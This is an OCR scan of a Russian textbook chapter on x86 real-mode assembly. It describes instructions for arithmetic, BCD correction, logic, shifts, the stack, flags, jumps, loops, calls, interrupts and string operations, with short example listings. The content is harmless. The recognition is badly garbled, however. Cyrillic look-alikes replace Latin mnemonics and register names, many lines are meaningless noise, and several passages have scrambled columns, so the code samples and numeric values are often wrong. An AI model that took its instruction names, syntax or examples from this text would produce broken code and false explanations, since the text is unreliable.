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ии ов авиа изо а ну и на ки вое е о ни пин ион о оон ана инон аи Бина нии о вв о вии о носов ое ни ни и ино пов ооавенкечь 


Ци 


СВУ 


СМ/О 


клана вони нео нокии ини коре ри кикии кори кн ромману кк зрря м коки лач я ин ме тияики зо ккок лисе ления знзжаснияи икея к 


Преобразованне слова в двойное слово (Сопуег{ мога №0 доцЫе ога) 


Команда заполняет ОХ знаковым битом числа, находящегося в АХ, преобразуя такиу 
образом 16-разрядное число со знаком в 32-разрядное. 


МЕС операнд 


Бури ява ли вьи ри давняя ьовъвьлю кро ни ци вину ви ири хол а зву риа я слив ия паз из икльииаяи но пр юдажаинь ни о маи кь низов иния нитки лана 


Изменение энака (дополнение до 2) (Свапре зп) 

Команда вычитает из нуля знаковое целочисленное значение операнда, преврашая 

положительное число в отрицательное и наоборот. В качестве операнда можно исполь- 
зовать регистр (кроме сегментного) или ячейку памяти. 





Примеры 
}==== Данные =====ЕЕ===ЕНЕНЕЕЕЕЕЕЕНЕЕНЕЕЕЕЕЕЕЕЕЕЕНЕЕНЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ 
Маз ОВ ' 0123456789" ; Массив Маз содержит АЗСТТ-коды цифр, 
; Маз[0] = ЗОВ, Маз[1] = 311, , 
; Ма5[9] = З9н 
Мом и ОЕЕЕЕВ ; Младшая часть 32-разрядного числа М 
м9 и 2209. ; Старшая часть 32-разрядного числа М 
поу ах, 00021 ; Младшая часть числа М 
пу 4х, 00058 ; Старшая часть числа М 
ааа ах, №юом ; Сложение младших частей, СР = 1 
аас ах, МН1ав ; Сложение старших частей, 
; в ПХ: АХ сумма М+М 
поу 51, Мон ; Е = 65535 
дес $1 . ; $1 = 65534 = ОРЕРЕВ 
пед 51 ; 91 =2 
еа рх, Маз 
оу а1, Маз +5 А =5 
0] ВУТЕ РТВ [0х + $1] $ АХ = 10 
поу 9х, 51 . 
дес ах ; Старшая часть делимого, ОХ = 1 
поу ах, 260 ; Младшая часть делимого, АХ = 261. 
поу Ьх, 1005 ; Делитель, ВХ = 256 
ЧУ Ьх . ; АХ = 256 (частное), ПХ = 38 (остаток) 
; Примечание. 


; При записи шестнадцатеричных чисел, начинающихся с А, В, С, 1, Е 
; или Е, справа приписывается 0, чтобы нельзя было спутать это 
; Число с именем ячейки памяти или каким-либо другим идентификатором. 
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Глава 1 кники имеем 


дрифметические команды (десятичная арифметика) — 
ААА, ААО, ААМ, АА$, РАА, РАЗ 


плезаниякуяе океан или ожияккию хозиивли зу икния козе иииеонниое заикания веляеке язя полке каяекожании 


А$СП-коррекцня АХ после сложения (АЗСП а@]и51 Гог а89) 
Выполнение команды ААА обычно имеет смысл после выполнения команды АРБ, 
орая оставляет байт результата в АЕ. Команда ААА корректирует сумму двух неупа- 

конных двоично-десятичных чисел, полученную в АГ. В результате коррекции в АХ 

формируется результат — неупакованное двоично-десятичное число. Если сложение при- 
вело к возникновению десятичного переноса, содержимое АН увеличивается и флаги СР 

и АЕ устанавливаются в 1. 


ААЗ 


„аежвожжежние я 


зозлиовяекиникилккокии ии навар ия крики ка ко нива кии ини викки ии я кии и киижкииики зе ккиии изо ников кии ники е „к 


А$СП-коррекция АХ после вычитания (АЗСИ ад Тог зибтасе 


Выполнение команды АА$ обычно имеет смысл после выполнения команд ОВ 
и $ВВ, которые оставляют байт результата в АЕ. Команда АА$ корректирует разность 
двух неупакованных двоично-десятичных чисел, полученную в АГ. В результате коррек- 
ции в АХ формируется результат — неупакованное двоично-десятичное число. Если 
вычитание привело к возникновению десятичного заема, содержимое АН уменьшается 
и флаги СР и АЕ устанавливаются в 1. 


ААМ 


ити А $СП-коррек ия АХ после умножения (АЗСП а@ 1$ Гог ти у) 
Команда используется для коррекции результата умножения двух неупакованных 


двоично-десятичных чисел. Команда делит содержимое АГ. на 10 и загружает частное 
ВАН, а остаток — в АГ. 


АА 


ООВ 


ко кокииеи ея ки кия вики кии я иски нии мидии воски ини ии кии кии на ну тииииске корки ениуюыияя 


А$СП-коррекция АХ перед делением (АЗСП ад 15 Гог 4114 
в Команда используется для коррекцин неупакованного двоично-десятичного числ: 
перед его делением на другое неупакованное двоично-десятичное число, так чтобь 


после деления был получен корректный результат. Это выполняется следующим обра 
м: АТ = АЁ+ (АН*10), АН = 0. 
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«ати ноя ииуьчяы има и чили ви чвы чин ия я чу яяяячння ивяялонан оя киа ыльнияия я ния вн яя ночи и ии чина ии нач нача пииинилияихю нянь 


Десятичиая коррекция АГ. после сложения (Беста] а4] 115 Гог 244) 

Команда обычно используется после выполнения команды сложения, которая оста, 

ляет результат сложения двух упакованных десятичных чисел в АГ. Команда корректи, 

рует результат, приводя его к десятичному упакованному виду. Флаги АЕи СЕ устанаь, 

ливаются, если в ходе коррекции возникает перенос из первого или второго десятичны, 
разрядов соответственно. 


узкие ину ииини нии зунииеиские и ениунояиинакнии зааниии ск ыиииаиннние знооскиени ви киви янениия закилик озна жииккия 


Десятичная коррекция АГ. после вычитания (Оесита| а9 15% Гог зиИгась 


Команда обычно используется после выполнения команды вычитания, которая остаь, 
ляет результат вычитания двух упакованных десятичных чисел в АГ. Команда корректи. 
рует результат, приводя его к десятичному упакованному виду. Флаги АЕ и СЕР устанаь 
ливаются, если в ходе коррекции возникает заем в первый или второй десятичный разря: 
соответственно. 








Примеры 

ем ах, 05028 ; Двоично-десятичное число 52 
ада а1, 091 ; А = ОВЬ 
ааа ; АХ = 06018 
оу ах, 03081 ; Двоично-десятичное число 38 
зар а1, 09 ; А. = ОРВ 
аа ; АХ = 02091 
поу а!, ОЗ ; Двоично-десятичное число 3 
оу с1, 081 ; Двоично-десятичное число 8 
01 с1 ; АХ = 24 = 18% 
аа ; АХ = 02041 
поУ ах, 02051 ; Цвоично-десятичное число 25 
поу с1, 07Н ; Двоично-десятичное число 7 
аад ; АХ = 25 = 1% 
91% с1 ; АЕ = О4Н (остаток), А1 = ОЗ (частное} 
поу а1, 29% 
10 а1 А. = 2АВ 
Даа ; АБ = 308 
поу а1, 508 

` дес а1 $ А. = АРЬ 
Заз ; А] = 490 
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Логические команды — АХО, МОТ, ОВ, ТЕЗТ, ХОВ 


Логическое И 

Команда выполняет побитовое логическое умножение первого операнда на второй 
результат операции записывается по адресу первого операнда. В качестве первого опе- 
ранда можно использовать регистр (кроме сегментного) или ячейку памяти, в качестве 
второго — регистр (кроме сегментного), ячейку памяти или непосредственное значение 
при этом не допускается оба операнда одновременно определять как ячейки памяти. 


ОК 1-й операнд, 2—0 операнд 


ккзсиикиквиии ина 
.. ния кии ви хкая ое никотина яиких 


Логическое ИЛИ 
Команда выполняет побитовое логическое сложение первого и второго операндов 
результат оперании записывается по адресу первого операнда. В качестве первого опе- 
ранда можно использовать регистр (кроме сегментного) или ячейку памяти, в качестве 
второго - регистр (кроме сегментного), ячейку памяти или непосредственное значение 
при этом не допускается оба операнда одновременно определять как ячейки памяти. 
ХОК тп операнд, 2-й операна 
р Исключающее ИЛИ* 
ва) ла выполняет операцию побитового исключающего ИЛИ (сложения по модулю 
ада В ь . и ими, результат операции записывается по адресу первого опе- 
ей рвото от ранда можно использовать регистр (кроме сегментного) 
, второго — регистр (кроме сегментного), ячейку памяти или 


непосредственн 
ое значение, при этом не допускается 

оба операнда одн: - 
делять как ячейки памяти. =” РИ одновременно опре 


р дй операно, 2-й операнд 


КОСА ЗАЗАР къелнь 
экеяеяимони жъъежние зева звяльни 
. ре сккея Чань я а вокала чкананиные виз жиннвная 


Кома Логическое сравнение 
нда в 

ри этом ыполняет побитовое логическое умножение первого операнда на второй 

> 

симости от результата устанавливаются флаги ЗЕ, 7Е иРРЕ, флаги ОЕ 


ИСЕ сб 
Расываютс 
я. В 
егментного) качестве первого операнда можно использовать регистр (кроме 


: или ячейку п 
ячейку памят Ку памяти, в качестве второго — регистр (кроме сегментного), 


И ил 
о и непосредственное значение, при этом не допускается оба операнда 
пределять как ячейки памяти. 


ЭдНоврем енн. 





ООО 
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МОТ операнд 


зичинняе ки юлиние чизоничожньнья зини чине нони яви ни ии ив ии ноет" а ичеикечаничньк еяичеяяинимы нома ььлет 


нозиценьня заязвия нения чин ии я ион ие тония 


Инверсия (дополнение до |} 


Команда выполняет инверсию битов операнда, заменяя 0 на 1 и наоборот. В качестве 
операнда можно использовать регистр (кроме сегментного) или ячейку памяти. 


Примеры 
;==== Данные с ееасееаеныенаняненененЕннЕЯНННННЯНЯНННН7Н79 7777 
Вусе ОВ 88 
у=Е== Команды ааенеененаенаенненннянкннняннЕННННННННН27777 77” 
хог сх, сх ;СХ= 0 
апа а1, ОСЬ ; Сброс двух младших разрядов регистра АЬ 
от ан, 03№ ; Установка двух младших 
; разрядов регистра АЬ 
хог а1, -1 ; Инверсия всех разрядов А 
се5% ах, 1 ; Проверка 0-го разряда АХ, 
. ; если 2Е = 0, разряд равен 1; 
ы ; если 7Е = 1, разряд равен 0 
сезе а1, Вухе; Проверка 7-го, 3-го, 2-го и 0-го разрядов 


; АБ,если РЁ = 0, свертка по модулю два 
; этих битов равна 0; если РЕ = 1, свертка 
; по модулю два этих битов равна 1 
сезе а1, а1 ; Проверка содержимого АБ, если 2 = 0, 
; содержимое АБ не равно 0; если ЕР =1, 
; содержимое АБ равно 0 


Команды сдвига — ВСЕ, ВСК, ВОГ, ВОВ, ЗАВ, ЗАГ, НЕ, $НВ 


$АИНЕ операноа, счетчи 


акжозавиккониккик ии няяя иконе ния нение ит* 


чиекя нокозини ная аки якоже мия кп неиинянннния 


Арифметический сдвиг влев /логический сдвиг влев 


Команда сдвигает биты операнда влево, при этом выдвигаемый (старший) бит посту ий" 
в СЕ, младший бит обнуляется. В качестве операнда можно использовать регистр (кроме и 
ментного) или ячейку памяти. В качестве счетчика можно указывать 1 или СТ. Каждый сли 
эквивалентен умножению операнда на 2. 


ЗАК операнд, счетчик 


зказуиежькие ее нознононыы ко ии и еконичих хекуаариичаю 


ИМ 


Арифметический сдвиг Вир 
убит и 
ов 


Команда сдвигает биты операнда вправо, при этом выдвигаемый (младший 
ступает в СЕ, старший бит сохраняет свое значение. В качестве операнда можно ис 
зовать регистр (кроме сегментного) или ячейку памяти. В качестве счетчика можно И 


зывать 1 или СГ. Каждый сдвиг эквивалентен делению операнда (числа со знаком) 


сновы программирования на Ассемблере ВМ РС 25 


Глава 1. О 


нЕ операно, счетчик 


И И 

двиг вправо 
Команла сдвигает биты операнда вправо, при этом выдвигаемый (младший) бит посту. 

пает в СЕ, старший бит обнуляется. В качестве операнда можно использовать регистр 

(кроме сегментного) или ячейку памяти. В качестве счетчика можно указывать 1 или СГ 
ВС операнод, счетчик 


алии ини ее читиеунн тя чижннкниккь 
м ижили изинник ция зан ча низа ченинию 
куни з нана нано жека ь 
ниже изъ анизуиения 


р Циклический сдвиг влево через СЕ 
Команда сдвигает биты операнда влево, при этом значение СЕ загружается 

в младший разряд операнда, выдвигаемый (старший) бит поступает в СЕ. В кач 
. естве 


операнда можно использовать регистр (кроме сегментного) или ячейку памяти. В к 
стве счетчика можно указывать 1 или СЕ. . аче- 


ВСК операнд, счетчик 


ненивь ея анемии юаня и ззивоввьиыльуииньне 
зезяелини жехиияоюнионинии 
нина изя узи ини ра ие ннюнвы . 
икияоониконо ВАЗАРИ 


Циклический сдвиг вправо 
через СЕ 
Омана сдвигает биты операнда вправо, при этом значение СЁ загружается в стар- 
разряд операнда, выдвигаемый (младший) бит поступает в СР. В качестве  веранра 


можно использовать регистр (кроме се т т т - 
егментного) или ячей: у | 
у ) ку памяти. В качестве счетчи. 


КОТ операнд, счетчик 


знзикианитинох икуженькк 
зеликквыкки вона ник я 


икзнная хпхкинижижиееня мунникик пкакеииажние 
каникеислюаииииях иажнниь 


Команда сдв Циклический сдвиг влево 
ига 
в ето младний НЫ операнда влево, при этом старший бит операнда загружается 
ментного) или р д. В качестве операнда можно использовать регистр (кроме сег- 
ку памяти. В качестве счетчика можно указывать | или СЫ 


КОК операнод, счетчик „7 


зунньних иена кииииикминнина в аваию нуна к еники хизвикежииивие ни 

Команда влет биг, Циклический сдвиг вправо 

я вего Старий я | операнда вправо, при этом младший бит операнда загружает- 

ментното) иди яч ряд. В качестве операнда можно использовать регистр (кроме сег- 
ку памяти. В качестве счетчика можно указывать 1 или СЁ 


Ком 
анды работы со стеком — РОР, РОРЕ, РОЗН, РОЗНЕ 
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поонви ии нон ини нае нию нявниае поро ва оо вона ао иона нае аз ново во нов ов они Оно оо унии иванов ина оное о ооо оо оспа ооо нов овиеюлооовавельнь. , 


хозльнньним нии в ия и нии ая нянь вии ии иво квин као ня ния ники чении х чи ик пв им ны нина чи ая ния яя чл ь ци ез из живее уимаккччьяьь 


Запись содержимого регистра флагов вс тек 


Команда уменьшает на 2 содержимое указателя стека и заносит содержимое реги : 
флагов в стек. - 


РОР операнд 


изу кисти ини ккие и си дите ииии аки в ними ион миня наи никак ик ик иска их иконки кии тиихияил киля ия пряди киян или ии ки няни к кии к 


увеличивает на 2 содержимое указателя стека. В качестве операнда может использовать. 
ся либо 16-разрядный регистр, либо 16-разрядная ячейка памяти. 


куку неворь каяки он кияк ии ак коек кои ка ними слики ни ин маки иконе ри каки ни ии ккияния Кии пл нев кии ри иикик кии вери ииикиихнлиисиях уу 


Чтение слова из стека и запись в регистр флагов 


Команда извлекает слово из стека и загружает его в регистр флагов, после чего уве. 
личивает на 2 содержимое указателя стека. 


Команды манипуляции флагами — СГС, СГО, сы, СМС, 5ТС, 
УТ, ТТ 


зпаеенроки ни ван кии ники я аи зи пика нии ини или кииижо ии кимоно нии пиков ао нии зим ину нике инки хи кии икики киля вхим ких ких: т." 


Сброс признака переноса (СШеаг саг!) 
Команда сбрасывает в 0 значение флага СЕ в регистре флагов. 


зззузяяяизяныия оны вяиння я ни иия кин ьь инь инь чыиини вины они яч ии и инь кии хи нитку квин и рии ны яя вия чехов я ни ечинле ниях 


озчананяниленяния вызнь вла яще кони аи вии я ния ини ио ники к и ивр изза копилки чо лия инь на яя июля ля чутье жилки я > 


Установка признака переноса ($1 саг] 
Команда устанавливает в 1 значение флага СЕ в регистре флагов. 


„зчичукиио ники коки имони ими ра киви ным ак ники ини ви иски киикики хи или клики ии ия ния ини пм ини ииили ии жи ян 


от младших адресов к старшим при работе строковых команд. 
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Глава 1 


«рзяякикти ия ко вия икии кои яве как к енд ня ив ие поннунии и ии вора ни зи ии ви ялпия тли ви овен чих к лы пуль вии оу чьинуя 


Установка флага направления (5е{ Фтесйоп) 


Команда устанавливает в 1 значение флага СЕ в регистре флагов, задавая движе- 
в от старших адресов к младшим при работе строковых команд. 


ранениями пни липкие ини ии ини митино ки ия кии няни нии кит нения ния 


Команда сбрасывает в 0 значение флага ПЕ в регистре флагов, запрещая внешние 
аппаратные прерывания (прерывания от УВВ). 


«шзновьаиньи ния ники иво пики ними ини ни копии ии ие пинок ним ии ни ня ии по кпи пни ни поля иными панроююиидкивири мании», 


Команда устанавливает в | значение флага ТЕ в регистре флагов, разрешая внешние 
аппаратные прерывания (прерывания от УВВ). 


Команды передачи управления — САТЛ,, ТУТ, МТО, ТМТЗ, ВЕТ, 
ХСОМо), ЗМР, ГООР, ГООР(СОМО), ВЕТ 


)МР операнд 


Учи сп кул вль лрки ки проник ыы унии яз ки нии ника ини имело ния гии ни возим кники ция ницы ны к пу уники аня янь зы ини хялевьни: 


Безусловный переход (Татр) 


Команда передает управление в указанную точку программы, не сохраняя при этом` 
адрес возврата. Операндом может быть непосредственный адрес, регистр (кроме сег- 
ментного) или ячейка памяти, содержащие адрес. Различают три разновидности команды 
безусловного перехода: 


\ короткий переход (5МР ЗНОВТ)— переход в пределах -128--+127 байт относительно 
команды УМР; 


но 
и лижний переход (3МР МЕАВ РТВ) — переход в пределах текущего сегмента кода; 
дальний переход (УМР РАВ РТВ) - межсегментный переход. 


таза ванаие 
Колина ККИ Вик икона копа веки ца ии нь крики мини имо кти мии ния впадина кри ин яиаиикинико 


Условный переход (Литр сопд оп) 
редает управление в указанную точку программы, не сохраняя при этом 
а, если выполняется условие перехода. Условием в каждом конкретном 
ется, рае определенных флагов (табл. 1.1.1). Если заданное условие не 
пяется ние получает команда, следующая за командой (СОМ). Переход 

пределах -128++127 байт. 


Команда п 
адрес Возвр ат 


СЛУчае 
Является 
ВЫПОЛНЯ состо. 


СУщест 
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коз наиия нано ниинанони аанинонания ии о аква ни иное или вия ино в нае зеуния ченоосаонаная нию и иная ин нина аи ии аа евтенивина зоныиииеннь 


Таблица 1.1.1. Варианть: команды ХСОМр, 


1еЕ Е ООО ОО 7257 
ом [мени о [50 
оНАЕДВ ЧЕЙ 
ЕЕ и 

р РЕ 

и РО 

5 ИЕ 

Е ЕО ООО С 

оо Гестьперелолнение 0 

то ОЕ 
АВАВЕ —  [вышене ниже [4=0И-О 
НАОВЕ —  [невышейиже нию [тт им 
оимЕ — [большейнеменыеи нею [РОО 
ЗЕМ, [больше или равнонененые [58501 
ПуОмеЕ —  [меньшинебоьшеинераю [ЗнераынобР 
_ ЛЕ/ЗМб 7Е = 1 или $Е не равно ОЕ 
КЕ ео 

ГООР метка 


кизхиолник кии жении закон каису хивьиия хикяинияенкижиксх гхи» диряяки и тока яры ох кярукиинаии Авин деть ви кчактаниии 


Повторение цикла, пока содержимое СХ не равно нуля 

Команда уменьшает значение СХ на | и, если СХ не равно нулю, осуществляет пере 

дачу управления в указанную точку программы (начало цикла); в противном случае К 

равно нулю), выполняется команда, следующая за командой ГООР, т. е. осуществляет 
выход из цикла. Переход осуществляется в пределах -128++127 байт. 


ГООР7ЛООРЕ метка 


занимая лия моя ко ними ви настя кхы зиняьу ку ит ход аьы аа я нии коки куни ить изн о дуры ии нид о 


Повторение цикла, пока нуль/равно (Роор \ВЙе хего/еаий! 

Команда осуществляет передачу управления в указанную точку программы (начат 
цикла), если после уменьшения значения СХ на 1 значение СХ не равно нулю и одне 
временно СЕ равно 1; в противном случае (СХ равно нулю или СЕ не равно 1), выполн* 
ется команда, следующая за командой ГООРХ, т. е. осуществляется выход из цикт 
Переход осуществляется в пределах -128++127 байт. 


Чи 
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[ООРМЕЛООРМЕ метка 


ук я ня уе иу чаи ы ини не уиюынчи узи ньк чик кьы вании ь нь иьачи она кун о ны ночия ки зон чу су ув ьш им узкыию ть 


Повторение цикла, пока не нуль/не равно (Гоор ме по 2его/по{ едиа!) 

Команда осуществляет передачу управления в указанную точку программы (начало 
цикла), если после уменьшения значения СХ на 1 значение СХ не равно нулю и одно- 
временно СЕ равно 0; в противном случае (СХ равно нулю или СР равно 1), выполняется 
команда, следующая за командой Г.ООРЯ, т. е. осуществляется выход из цикла. Переход 
осуществляется в пределах -128-+127 байт. 


САЦ. операнд 


заланаааининия к тнели жезиние чанние зажаниимичики» пени ка вика лисниниу итак ие опия яма ы принести 


Вызов подпрограммы (процедуры) 
Команда сохраняет в стеке текущий адрес (адрес команды, следующий за командой 
САША.) и передает управление на адрес, заданный операндом. В качестве операнда может 
использоваться непосредственное значение относительного смещения (метка), регистр 
(кроме сегментного) или ячейка памяти, содержащие адрес перехода. Если в качестве 
адреса указано 16-разрядное смещение, считается, что исполнительный адрес находится 
в том же сегменте, т. е. осуществляется ближний вызов подпрограммы (МБАК РТЕ). 
Если в качестве адреса указано 32-разрядное значение, осуществляется дальний вызов 
(РАК РТВ), Т. е. вызов подпрограммы, находящейся в другом программном сегменте. 
Команда ближнего вызова в качестве адреса возврата сохраняет в стеке 16-разрядное 
значение относительного адреса, команда дальнего вызова — 32-разрядное значение пол- 
ного адреса. Подпрограмма обычно заканчивается командой ВЕТ. 


жънь Хулия ня чении яя ии ини а НЯ пл ик ия азы кия кинь ян чи чи ян чья ни нкиянь ни уния ии ччининя ин нал ж у ня хи чины 


Возврат из подпрограммы (процедуры) (Веги) 
аа передает управление по адресу возврата, находящемуся на вершине стека. 
а ольный параметр (значение которого кратно 2) команды указывает количество 
сли ль трое необходимо дополнительно удалить из стека, это бывает необходимо, 
ме ве подпрограммы ей передавались параметры через стек. Встретив в про- 
или ВЕТЕ р , ассемблер заменяет ее на КЕТМ (возврат из ближней процедуры) 
 рограмма зврат из дальней процедуры) в зависимости от того, как была описана под- 

. орую завершает команда КЕТ. Команда КЕТМ извлекает из стека одно 


Слово — в 
ва. м относительный адрес точки возврата. Команда КЕТЕ извлекает из стека два сло- 
лный адрес точки возврата. 


Коман Программное прерывание 
два лова заносит в стек три слова: содержимое регистра флагов, С$ и ТР (последние 
Уть адрес возврата) и передает управление на программу обработки прерыва- 
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ния (так называемый обработчик прерывания), 8-разрядный номер которого указан 
в качестве операнда, загружая в пару регистров С5: 1Р 32-разрядный вектор прерывания 
(адрес первой команды обработчика прерывания). Обработчик прерывания обычнь 
завершается командой ВЕТ. 


кли зукинаюилижиие Фета чу капли дл ковки киви каркикикь ж ария они ия нии зако я ником икс ития риа аки пир онииеи яние жиканто 


Возврат из обработчика прерывания 


Команда возвращает управление прерванной программе, извлекая из стека три верх. 
них слова, загружая считанными значениями ГР, С$ и регистр флагов. 


хина линиелль зузин инки ине н ии вин я и ния ии ви ни оны я или ями ии ники ныяя ии ии яду ции иинниан ки лис киия и ними чин учел къьала, 


Прерывание по переполнению 

Будучи установленной после арифметической или логической команды, инициирует 

процедуру прерывания с номером 4, если в результате выполнения предшествующей 
команды установился флаг переполнения. 


Применяется отладчиками, работающими в реальном режиме. Эту однобайтную коман- 
ду записывают вместо первого байта команды, перед которой требуется точка останова. 


Примеры 
;==== Данные =======Е====Е=====ЕЕЕЕЕНЕЕЕНЕЕЕЕНЕЕНЕЕЕЕЕНЕЕЕЕНЕЕНЕЕНЕЕЕЕЕ 
АаатМеах ОИ (2) ; Адреса переходов, 
АЗатЕах ПО (2) ; вычисляемые 
АЧагРхос 09 (?) ; программно 
Ведиез* ОВ 'Введите символ,’, 00р, ОАЪ 
ОВ 'Е - завершение программы’, ООп, ОАВ 
; ООН - возврат каретки, 
. ; САБ - перевод строки 
ОВ 75! ; Приэнак конца строки для 
; функции 095 прерывания 218 
Маз Я 1,2, 4, 3, 6, 7, 5, 0 
Маз31те = ($ - Маз) /2 
}==== Команды ==Е====ЕЕ=ЕНЕЕЕЕЕЕЕЕНЕНЕЕЕЕЕЕЕЕЕЕЕЕЕНЕНЕЕЕНЕЕТЕЕЕЕЕВЕЕЕЕЕ 
тр МЕАВ РТВ Ро1п&1 
пр ИОВО РТВ АаатМеаг 
Этр РАВ РТВ Ро12 ; Примеры дальних 
пр ОМОВО РТК АЗатЕах ; безусловных переходов 


Са11 МуРгос1 ; Примеры ближних 
са11 МОВО РТВ [Ьх + $1] ; вызов подпрограмм 
са11 95: АаатРхос ; Пример дальнего вызова 
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Глава ини иене пни ияинеиининан 
; подпрограммы 
; Процедура МуРгос1 
НуРТО- ... 
тес 
И ; Вывод на экран запроса на ввод символа 
пу ав, ОЭн ; Номер запрашиваемой 
; системной функции 
По 9х, ОРЕЗЕТ Веацез& 
; Параметр - адрес 
; ВЫВОДИМОЙ Строки 
108 21 ; Вызов системной функции 
; (вызов обработчика программного 
; прерывания с номером 218 - 
; диспетчера 105) 
; Бесконечный цикл анализа введенных символов, 
; ввод Е - выход из цикла 
Мехё: поу ан, 011 ; Вызов системной 
ое 23% ; функции (011) ввода символа 
стр а!, 'Е’ ; Функция вернула код символа Е? 
)2 ОрсОЕРгоа ; Если да, на выход 
пр Мехе ; Если нет, переходим на ввод 
; очередного символа 
ОчсОЕРтоа: | | 
акне ЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЕВеЕЕЕНЕЕЕЕЕНЕЕНЕЕЕЕЕ 
| \ 


; Подсчет контрольной суммы (КС) 
; (суммы без учета переносов) содержимого массива Маз 
поу $1, ОРЕЗЕТ Маз ; Адрес массива 
оу сх, Маз512е ; Размер массива 
са11 МуРхос2 ; Вызов процедуры 
; подсчета КС 
; области памяти 


; Процедура подсчета КС области памяти (0П) 
; При вызове; 05: 51 - адрес ОП, СХ - размер в словах. 


; При возврате: АХ - контрольная сумма. 
МУРтос2 ВОС 


хох ах, ах ; Обнуляем регистр, в котором будем 
Мехе: , у ; накапливать КС 
' а99 ах, [$1] ; Сложение промежуточного значения 
; КС с очередным элементом массива 
пс 51 ; Подготовка к обработке 
1пс $1 ; следующего элемента массива 
1оор Мехе . ; Если не все элементы массива 


; обработаны, повторяем цикл; 
; в противном случае в АХ искомое 
; значение КС - выход из процедуры. 
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ге\ ; Возврат из процедуры 


МуРтос2 ЕМОР 





; Примечание. 
; РВОС и ЕМОР - директивы организации процедур, 


; указание начала и конца процедуры. 


соответственно 


Команды строковой обработки — СМР5, [.О0$, МОУ5, $СА$, 5ТО$ 


ельность байтов или слов. Всли флаг направления пе, 


Строкой называют последоват 
ачение в индексном регистре пос 


ред выполнением строковой команды сброшен в 0, зн 
выполнения предписанного действия увеличивается на 1 (если команда работает с бай 


тами) или на 2 (если команда работает со словами). Если флаг направления перед выпоу 
нением строковой команды установлен в 1, значение в индексном регистре после выпох 
нения предписанного действия уменьшается на 1 (если команда работает с байтами) из 
на 2 (если команда работает со словами). Строковые команды часто используются с пр 
фиксами повторения ВЕР, ВЕРР/ВЕРЕ, ВЕРМИ/ВЕРМЕ. 


мо\5В | 


строки в строку (Моуе тс БУ 
стров 5: УТ, в ячей 
ти от значения фл 


Команда копирует байт из ячейки 
памяти, адресуемую парой регистров 
направления ОЕ содержимое регистров 


Е$: ОГ, после чего в зависимос 
$1, ОГ увеличивается или уменьшается на 1. 


зекизинниие заза зна винанюижаи нения 11° 


у (Моуе 515 мой 
тров 05: $1, в я 
от значения $1 
на 2. 


Команда копирует слово из яч 
ку памяти, адресуемую парой регистров Е$: 01, после чего в зависимости 


га направления РЕ содержимое регистров $1, ОГ увеличивается или уменьшается 


Чтение байта из строки (10а 518 Бу 
йт из ячейки памяти, адресуемо 


Команда копирует ба 
от значения ОЕ содержимое регистр ` 


в регистр АЁ, после чего в зависимости 
увеличиваегся или уменьшается на 1. 
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Гла 


зспижьяькочинияя иекненинь 
ож зячиияя . 


а копирует сл в 
АХ после ы ово из ячейки памяти, адресуемой парой реги 

в регистр , его в зависимости от значения ОЕ регистров 05: $1, 

увеличивается или уменьшается на 2. содержимое регистра $1 


«тучьееляаи чеки то сия ининьк 
зежньчинни изоньннчи 


шиннение „ 
чончезу иво чиная нянь 
язве я 

щнььь 

жуни я 


и ИИА 
апись слово в строку (юге $"то \уога) 


Команда коп ы 
р 


ров Е5: ОЁ, после чего 
, в зависимости от значения РЕ соде 
вается или уменьшается на 2. держимое регистра О увеличи- 


с шеи 

Команда сравнивает байты двух рок выч строк по байтам (Сотраге те Бе) 
рами ЕЗ: ПБ] ‚ вычитая второй опе . 

) из первого (адресуемого регистрами 55. $0) ры ИИ 

9» ает признаки 


результата, пос 

‚ после чего в зависи 

ЛИЧИв. мости от значения 

ается или уменьшается на 1. РЕ содержимое регистров 51, ОГ уве- 


ок, вы й 
стро ая второй операнд (адресуемый регист- 
эмото реги рами 25: $1), устанавливает признаки 
ния ОЕ содержимое регистров 5Т, О] уве- 


Ком. 
а 
Нда сравнивает содержимое 


› адресуемой егистр 
Уемой регистрами Е5: регистра АГ. с 8-разрядным содержимым ячей 
и Ез: О], в ржимым ячейки памя- 


ерво 
Го (со ычитая вт. я 
от Значения ИМО АГ), устанавливает пр к операнд (содержимое ячейки памяти) из 
содержим и результата, после ч 
ржимое регистра О! увеличивается или уменьшается на м ЗАВИСИМОСТИ 
на 1. 


2 
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Сканирование строки по словам (5сап ито \0г4) 

Команда сравнивает содержимое регистра АХ с 16-разрядным содержимым ячейки па- 

мяти, адресуемой регистрами ЕЗ: ОТ, вычитая второй операнд (содержимое ячейки памяти) 

из первого (содержимое АХ), устанавливает признаки результата, после чего в зависимости 
от значения РЕ содержимое регистра Р1 увеличивается или уменьшается на 2. 


Префиксы повторения — ВЕР, ВЕРЯ/ВЕРЕ, ВЕРМЯ/ВЕРМЕ 


Вышерассмотренные строковые команды работают только с одним элементом стро- 
ки, в То же время операции со строками предполагают зацикливание. Для того чтобы 
упростить реализацию циклов со строковыми командами, предусмотрены префиксы 
повторения, позволяющие выполнить строковую команду необходимое число раз. 


окзованьвь зррониинкь чин о нь риризыи нано ть ния пов илиы японии яя ни рыкыки прави наии окна вия чи икон ной Ня клена океане 


Повторять СХ раз (Вереа® 
Префикс заставляет процессор выполнить стоящую за ним строковую команду СХ 


раз, уменьшая его содержимое на 1 при каждом очередном ее выполнении. Обычно 
используется с командами ЕОР$, МО\$, 5ТО$. 


ВЕРИ/КЕРЕ 


ели влькиллиииюня эпики оноыиыии нии ния паза пони и ина луна лно лав зил врьплвы вони ки ни наи чз липня укьи ло роинатт о ыкломя юля 


Повторять пока нуль/повторять пока равно 

(Вереаё Ве 2его /еадиа!) 

Префикс заставляет процессор выполнить стоящую за ним строковую команду не 

более СХ раз, уменьшая его содержимое на 1 при каждом очередном ее вьмтолнении. 

Выполнение команды прекращается, если флаг 7Е равен нулю. Обычно используется 
с командами СМР$, $САЗ. 


КЕРМИ/КЕРМЕ 


эоояничие нии мин ино унии во ни ко дакы юны шины зккзия нина ноя каяки кино мини и ини року аии ния ти вии меш ики ое инея поки жики кие т" 


Повторять пока не нуль/повторять пока не равно 

(Вереаё Ве по 2его /едиа/) 

Префикс заставляет процессор выполнить стоящую за ним строковую команду #® 

более СХ раз, уменьшая его содержимое на 1 при каждом очередном ее выполнении. 

Выполнение команды прекращается, если флаг Е равен единице. Обычно используется 
с командами СМР$, $СА$5. 


‘тер?  зсазм ; 
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Примеры 
„=== Данные === яяяяяяяняняяяня==ннан======ЕННЫЕНЕНН===Н==5====== 
Е ОВ 1008 ПОР (?) 
Е ОВ 'Строка текста’ 
сегьей = $ - 5% 
